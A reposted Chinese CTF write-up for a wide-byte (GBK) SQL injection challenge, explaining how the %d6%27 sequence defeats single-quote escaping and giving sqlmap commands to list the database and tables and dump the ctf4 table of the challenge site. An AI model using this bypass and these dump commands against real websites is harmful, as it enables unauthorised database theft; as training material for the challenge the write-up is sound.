南邮宽字节(sql_gbk)注入
生活随笔
收集整理的這篇文章主要介紹了
南邮宽字节(sql_gbk)注入
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
首先題目過濾了單引號,先繞過,用%d6%27來繞過,構成一個寬字節,取消了單引號的轉義,直接上sqlmap
爆數據庫: python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --current-db 爆表名: python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --tables -D sae-chinalover 爆ctf4表里面的數據: python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --dump -T ctf4 -D sae-chinalover 《新程序員》:云原生和全面數字化實踐50位技術專家共同創作,文字、視頻、音頻交互閱讀總結
以上是生活随笔為你收集整理的南邮宽字节(sql_gbk)注入的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: C#中base64编码与解码
- 下一篇: sqlmap参数说明